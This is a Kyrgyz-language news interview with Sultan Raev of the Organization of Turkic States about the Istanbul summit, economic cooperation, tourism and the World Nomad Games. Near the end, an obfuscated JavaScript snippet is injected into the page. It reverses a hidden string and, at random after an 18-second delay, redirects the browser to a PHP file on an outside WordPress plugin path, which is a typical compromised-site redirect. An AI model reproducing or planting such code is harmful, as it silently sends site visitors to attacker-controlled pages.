БИРИМДИГИБИЗ – ТҮБӨЛҮКТҮҮ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 29

Азыркы мезгилде Түрк мамлекеттер уюму дүйнөлүк аренадагы эң күчтүү, таасирдүү уюмга айланып баратат. Кыргызстан бул уюмдун түзүүчү жана эң активдүү мүчөсү. Бул эл аралык уюм учурдагы түрк дүйнөсүнүн алкагындагы экономикалык, социалдык, маданий-гуманитардык интеграция процессине өзгөчө салым кошуу менен тилдик, маданий, дилдик иденттүүлүгү жакын элдердин башын кошуп, бүгүнкү кырдаалдагы маселелерди чогуу чечүү идеясын көздөйт.

Түрк мамлекеттер уюмунун иш-аракеттери тууралуу айтып берүү максатында бул эл аралык уюмдун Генералдык катчысынын орунбасары Султан РАЕВди сөзгө тарттык.

— Султан Акимович, азыркы дүйнөлүк кырдаалда, ар кандай геосаясий оош-кыйыш заманда Түрк мамлекеттеринин уюму өзгөчө роль ойноп, дүйнөлүк таанымга ээ болуп баратат. Ошол эле учурда уюмдун катары өсүп, ар тараптан күчтүү түрк дүйнөсүн эл аралык аренада таанытып жатканын эксперттер, саясий серепчилер айтып келет. Сөз кезегин ушул багытка бурсак…

— Түрк мамлекеттеринин тарыхында өткөн жылда ири тарыхый окуя болгонун дүйнө жүзү угуп, жакындан билди. Былтыр ноябрь айында Стамбулда өткөн Түрк мамлекеттеринин башчыларынын VIII  саммити тарыхый чечим кабыл алды, башкача айтканда, кылымдар бою Түрк атанын балдары эңсеп келген биримдиктин пайдубалы түзүлүп, жети түрк тилдүү өлкөлөрдүн башын кошуп, бириктирген – Түрк мамлекеттер уюму түзүлдү. Өзүңүздөргө кеңири маалым, буга чейин биздин уюм түрк тилдүү өлкөлөрдүн Кеңеши деген макамга ээ болуп келсе, Стамбулдагы саммитте өлкө башчыларыбыз эл аралык уюм катары колдоп, ага жаңы макам берип, мазмуну жана мааниси жагынан жаңы бийиктикти, жаңы багытты көздөгөн уюмду негиздеди. Кыргызстан бул уюмдун башатында турган өлкө.

Түрк мамлекеттеринин башчыларынын VIII  саммити чындыгында тарыхый чечимди кабыл алды, биринчиден эл аралык маккамга ээ болсо, экинчиден кызматташуунун “Түрк көз карашы – 2040” стратегиялык концепциясы кабыл алынды. Бул документти түрк мамлекеттеринин өнүгүү жол картасы деп атасак болот, анткени документте түрк өлкөлөрүнүн 2040-жылга чейинки кызматташуу жаатындагы багыты жана перспективасы камтылган. Негизги маселе – экономикалык байланыштарды чыңдап, күчөтүп, бири-бирибизди экономикалык жактан колдоо идеясы эң башкы ролду ойнойт. “Түрк көз карашы – 2040” стратегиялык концепциясы түрк мамлекеттер ортосундагы байланышты жаңы баскычка көтөрүп, тең укуктуулук, паритеттүүлүк негизде тил жана менталитети, маданияты жана баалуулуктары, тарых жана тагдыры жагынан бир тууган элдердин ортосундагы көпүрө катары кызмат кылат. Бул концепциянын негизинде ири экономикалык долбоорлор, бизнес пландар, эки тараптуу жана көп тараптуу соода-сатык маселесин чыңдоо, ошондой эле өзгөчө маани транспорт жана коммуникация маселерине, бажы системасын либералдаштырууга, бекем транспорттук артерияны жаратууга багытталган. Концепциянын экономикалык сегменти – биздин өлкөлөрүбүздүн экономикалык каатчылыктан чогуу-чаран чыгуусуна бирден-бир тирек болот деген ишеничтебиз. Бул процесске Кыргызстан активдүү тартылганы акыркы кездердеги соода жүгүртүү жана инвестиция тартуу маселелеринен байкалат. Ал  1 млрд доллардан ашуун көрсөткүчтү мерчемдеди.

— Бул уюмдун экономикалык карым-катнашта ролу кандай?

— Биздин уюм экономикалык карым-катнашты өнүктүрүүгө болгон байланыштын эки жана көп тараптуу принциптерин жайылтуу максатында иш алып барууда. Орто Азиядан Түркия аркылуу  Европага чейинки  транспорттук коридорду тоскоолдуксуз жаратуунун, санариптештирүүнүн үстүндө мамлекеттер аралык иш жүрүп жатат. Буга Кыргызстан, Өзбекстан, Казакстан, Түркмөнстан, Азербайжан, Түркия, Венгрия  өлкөлөрү тартылды. Аталган өлкөлөрдүн тарнспорт министрликтери бул процесске батыл киришип, иштиктүү чараларды иштеп чыгуунун аягына чыгып баратат. Жол, коммуникация – экономиканын негизги кыймылдаткыч күчү, артериясы.

Ошондой эле өлкө башчылары саммитте  кызматташуунун экономикалык механизминин бирден-бир конкреттүү рычагы болгон –Түрк мамлекеттеринин өнүгүү инвестициялык фондун түзүү чечимин кабыл алды. Түрк мамлекеттер инвестиция фонду эки тараптуу жана көп тараптуу долбоорлорду турмушка ашырууга финансылык механизм болуп берет деген ишеним чоң. Азыркы күндө бул багытта даярдык иштери башталды. Бул финансы институтун Бишкекте ачуу жана жайгаштыруу демилгесин Кыргыз Республикасынын президенти С.Н.Жапаров саммитте көтөрүп чыккан. Ал Түрк мамлекеттеринин өлкө башчыларынын чечими менен колдоого алынат деген жакшы ниетте турабыз.

— Султан Акимович, туризм чөйрөсүн өнүктүрүү да маанилүү маселе. Бул багытта кандай иштер жүргүзүлүп жатат?

— Арийне, туризм Түрк мамлекеттернин башкы приоритети. Бул багытта Түркия менен Азербайжандын туризм чөйрөсүндөгү жетишкендиги өтө чоң сабак болот. Түрк өлкөлөрүнүн аймагында “Модерн: Жибек Жолу” аттуу туристтик концепция ишке киргени жатат. Бул процесске Кыргызстан да тартылган. Кыргызстандын жана башка Орто Азия өлкөлөрүнүн потенциалы чоң. Эң башкысы заманбап инфраструктура менен туристтерге болгон шартты жандандыруу оң натыйжасын берет деген үмүттөбүз. Түрк мамлекеттер алкагында туристтик форумдарды өткөрүү, тажрыйба алмашуу жүрүп жатат. Кокон шаарындагы “Модерн: Жибек Жолу” туристтик концепциясынын алкагында өткөн форум Орто Азия өлкөлөрүнө, анын ичинде Кыргызстанга мүмкүнчүлүк жаратууда бир кыйла мотивация берди. Азыркы учурда Кыргызстандын туристтик чөйрөсүнүн жагымдуулугу боюнча Түркиянын башкы каналдары да жакшы иш алып барууда. Ал гана эмес, Түркиянын борбору Анкарадагы лет-экрандарда Кыргыз Республикасынын Президенти С. Жапаровдун  Каракол лыжа базасында лыжа тепкендиги чоң резонанс, позитивдүү маанай жаратты. Кичинекей деталь болгону менен чоң эффект жаратып жатканын Түркия ММКлары байма-бай айтып жатат.

— Бул багытта Анкарадагы Кыргызстандын Түркиядагы элчилиги да чоң иш жасап жатканынан кабарыбыз бар…

— Туура. Биздин элчилигибиз, элчи Кубан Өмүралиев чындыгында эле алгылыктуу иштерди жасап жатат. Бу кеп “көзүн көрүп мактаганда эмес” дегендей. Былтыр Түркия менен  Кыргызстандын дипломатиялык мамилерине 30 жыл толду. Бул багытта ондогон иш-чаралар өткөрүлүп, 30 жылдын аралыгындагы стратегиялык өнөктөш, бир тууган өлкөлөр катары эбегейсиз иш жүргөндүгү жогорку трибуналардан айтылды. Акыркы эки жылда экономикалык, социалдык, маданий-гуманитардык чөйрөдө активдүү аракеттер жүрүп жаткандыгын сезип жатабыз. Өзгөчө экономикалык багытта конкреттүү аракеттер турмушка ашырыла баштады. Түрк-кыргыз инвестициялык фонду, ишкерлер форуму, Түркиянын соода палатасы реалдуу экономиканы өнүктүрүүнүн аракетин чечүү багытында Кыргызстанда, Түркияда ишкерлер форумун өткөрдү. Бир млрд доллардан ашуун соода-сатык, товар жүргүзүү, реалдуу  долбоорлорду турмушка ашыруу маселеси старт алды. Албетте, бул маселеде биздин элчилигибиз алдыңкы позицияны ээлеп турат. Ошону менен бирге эле маданий-гуманитардык багыттагы иштер да жанданды. Элчиликтин демилгеси менен Анкарада Айкөл Манастын эстелиги ачылды. Жусуп Абдырахманов, Касым Тыныстанов, Курманжан Даткага окшогон тарыхый инсандарга өзгөчө урмат көрсөтүлүп жаткандыгы кубантпай койбойт. Түркиядагы  дипломатиялык чөйрөнүн арасында биздин элчиликти эң активдүү элчилик катары баалап келишет. Албетте, ал иш жүзүндө да байкалып жатат.

— Султан Акимович, быйыл күзүндө Түркияда Дүйнөлүк VI көчмөндөр оюну өтөт. Буга карата  кандай даярдыктар жүрүүдө? Кыскача айтып өтсөңүз?

— Азыркы учурда Түркияанын Изник шаарында дүйнөлүк көчмөндөр оюнун өткөрүүгө старт берилди. Мен жакында эле Анкарада  өткөн уюштуруу комитетинин ишине катышып келдим. Албетте, өтө амбициялуу пландар алдыга коюлууда. Бүгүнкү күнгө карата 74 мамлекеттен 2000ден ашуун этноспортчулар катышуусу күтүлүүдө. Дүйнөлүк көчмөндөр оюну ириде кыргыз элинин руханий баалуулугу жана дөөлөтү, башкача айтканда руханий бренди. Бир тууган Түркия бул оюнду жогорку деңгээлде өткөрөрүнө ишеничибиз чоң. Былтыркы жылы Изник шаарында өткөн алгачкы уюштуруу комитетинин иш-чарасында Бүткүл дүйнөлүк этноспорт федерациясынын президенти Билал Эрдогандын сөзүнөн үзүндү келтиргим келет. Ал минтип айткан эле: “Түркияда көчмөндөр оюнун өткөрө турган кооз жерлерибиз көп. Бирок, биз эмне үчүн Изник шаарында өткөрүп жатабыз? Анын үч себеби бар: биринчиси – Изник шаары түрк эли менен кыргыз элин тарыхый жактан байланыштырган шаар, эски тарыхыбыздагы Селжук доорунда, түрк элинин башына эң кыйын мезгил түшүп турганда, миңдеген чакырым жерлерди басып өтүп, кыргыз баатырлары түрк бир туугандарына жардамга келген. Ушул шаарда баатырларча курман болгон, алардын эстелигине түрк эли таазим этет. Экинчиден: бул шаар бир туугандык менен, бир боордоштуктун символу, кыргыз баатырлары бул жерден түбөлүккө орун алган. “Кыргыз жоокеринин күмбөзү” бар. Бул тарых, тарыхка ыйык мамиле жасагыбыз келет. Үчүнчүдөн: кыргыз эли дүйнөгө көчмөн оюнун алып чыкты, ошондой эле ушул оюнду улантуу үчүн Түркия мамлекетине өткөрдү. Биз кыргыз элинин ишенимин жогорку деңгээлде аткарабыз жана көчмөндөр оюнунун дүйнөлүк сапарын мындан ары улантабыз. Биз ошол ыйык түшүнүктөр менен Изник шаарында Дүйнөлүк көчмөндөр оюнун өткөрүү чечимин кабыл алдык! Биздин, түрк элдеринин биримдиги – Түбөлүктүү!” деген. Бул сөзгө эч кандай кошумчанын кереги жок деп ойлойм…

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Бахпурбек Аленов

25-февраль, 2022-ж. / Редакция / Жаңылыктар 29
Бөлүшүү: Telegram WhatsApp X